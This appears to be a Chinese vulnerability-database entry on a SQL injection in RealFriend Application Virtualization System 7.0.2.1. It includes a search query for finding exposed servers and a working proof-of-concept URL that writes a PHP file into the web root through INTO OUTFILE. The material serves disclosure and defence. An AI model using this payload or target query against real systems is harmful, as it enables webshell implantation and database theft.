跳转至

瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞

漏洞描述

瑞友 应用虚拟化系统 GetBSAppUrl方法存在SQL注入漏洞,由于参数传入没有进行过滤导致存在SQL注入,攻击者通过漏洞可以获取数据库敏感信息

漏洞影响

瑞友应用虚拟化系统 7.0.2.1

网络测绘

"CASMain.XGI?cmd=GetDirApp" && title=="瑞友应用虚拟化系统"

漏洞复现

登陆页面

img

在 GetBSAppUrl 方法中存在SQL注入漏洞,通过漏洞可以写入Webshell文件

img

验证POC

/index.php?s=/Agent/GetBSAppUrl/AppID/')%3bselect+0x3c3f70687020706870696e666f28293b3f3e+into+outfile+%27C%3a\\Program+Files+(x86)\\RealFriend\\Rap+Server\\WebRoot\\test7.php%27%23/123

img

/test7.php

img